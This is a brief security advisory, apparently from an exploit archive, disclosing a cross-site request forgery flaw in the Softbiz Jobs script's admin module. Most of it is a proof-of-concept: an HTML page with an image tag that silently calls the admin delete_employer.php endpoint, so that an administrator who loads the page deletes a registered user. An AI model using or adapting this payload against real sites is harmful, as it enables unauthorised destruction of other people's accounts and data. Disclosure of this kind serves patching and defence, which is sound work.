=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# Downloadhttp://www.softbizscripts.com/# Scriptsoftbizscripts# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................<html><body><img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]/></body></html>...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.#If you have any questions, comments, or concerns, feel free to contact me.
